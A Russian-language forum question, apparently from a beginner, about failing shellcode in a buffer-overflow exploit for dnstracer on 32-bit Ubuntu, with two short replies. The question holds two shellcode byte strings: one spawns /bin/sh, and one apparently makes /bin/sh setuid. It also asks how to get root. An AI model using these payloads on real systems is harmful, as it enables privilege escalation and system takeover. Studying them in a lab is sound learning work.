# Не работает шелл код на линуксе

Tags: linux, c, безопасность, buffer

Уже не знаю, где искать, вынужден спросить у вас
Пытаюсь сделать шелл код для зарепорченной уязвимости переполнения буфера в программе dnstracer
ОС: Ubuntu 32 bit
Я пробовал разные шеллкоды и у меня получалось только 2 варианта развития событий:

1)Например для такого шеллкода

```
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
```

программа завершается с ошибкой *Program received signal SIGILL, Illegal instruction.*

2)А например для такого

```
  "\xeb\x1f\x31\xc0\xb0\xb6\x5b\x31\xc9\x31\xd2\xcd\x80\x31\xc0\xb0\x0f\x89\xdb\x66\xb9\xed\x09\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
```

программа завершается ошибкой в libc:

```
0xb7e21637 in __libc_start_main (main=0x8048aa0 <main>, argc=3, 
    argv=0xbfffefa4, init=0x804b6b0 <__libc_csu_init>, 
    fini=0x804b710 <__libc_csu_fini>, rtld_fini=0xb7fea8a0 <_dl_fini>, 
    stack_end=0xbfffef9c) at ../csu/libc-start.c:291
291 ../csu/libc-start.c: No such file or directory.
```

Я новичок в этом деле и не понимаю, в чем проблема? Шелл код плохой? И если так, то как написать нормальный простой шеллкод для получения прав суперпользователя? (адрес для вставки шеллкода я правильно нахожу, проверял на nop последовательности. Всякие защиты типа ASLR тоже отключаю ).
Заранее благодарю

Comment: Для получения прав суперпользователя воспользуйтесь коммандой `su`

Comment: Изучайте ассмеблер, смотрите что идет не так, в отладчике. Что толку изучать шеллкоды если вы не знаете с точностью до байта что они должны делать. Как можно использовать шеллкод о котором вы знаете только некую строку байт, надо же видеть его исходный код, смотреть если ли в программе те точки, которые он использует